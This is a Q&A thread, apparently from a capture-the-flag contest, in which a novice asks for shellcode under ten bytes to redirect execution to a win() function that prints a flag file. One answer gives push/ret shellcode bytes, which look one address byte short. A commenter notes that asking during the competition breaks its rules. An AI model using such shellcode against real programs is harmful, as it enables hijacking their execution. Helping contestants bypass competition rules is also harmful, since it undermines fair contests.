# calling C functions shellcode

Tags: shellcode

I have the following dump taken from gdb

```
 00000000004006f6 <win>:

 4006f6:       55                      push   rbp
 4006f7:       48 89 e5                mov    rbp,rsp
 4006fa:       bf 98 08 40 00          mov    edi,0x400898
 4006ff:       e8 8c fe ff ff          call   400590 <system@plt>
 400704:       5d                      pop    rbp
 400705:       c3                      ret
```

Usually this C function is never called however I need to write some shellcode thats less then 10 bytes to run it or get the value displayed. Here is the source of the function;

```
void win(){
    system("/bin/cat ./flag.txt");    
}
```

I'm still a novice at both assembly and C, so any help is appreciated.

Comment: 10 bytes?  The string parameter is more than 10 bytes.  I don't understand.

Comment: Thats what im confused about, apparently there is a way to manipulate the eip to call the function. Im at a lose of what to do at this stage.

Comment: Asking questions on SO during the competition is against the rule

Answer (score 1):

In order to run function `win()` you must do write `push <function-win-address> ret` in shellcode.

In your case that will be:
`\x68\xf6\x06\x40\xc3`

`\x68` is `push`

`\xf6\x06\x40` is the function address

`\xc3` is `ret`

Answer (score -1):

mov eax, (win addr)

call eax

objdump opcodes after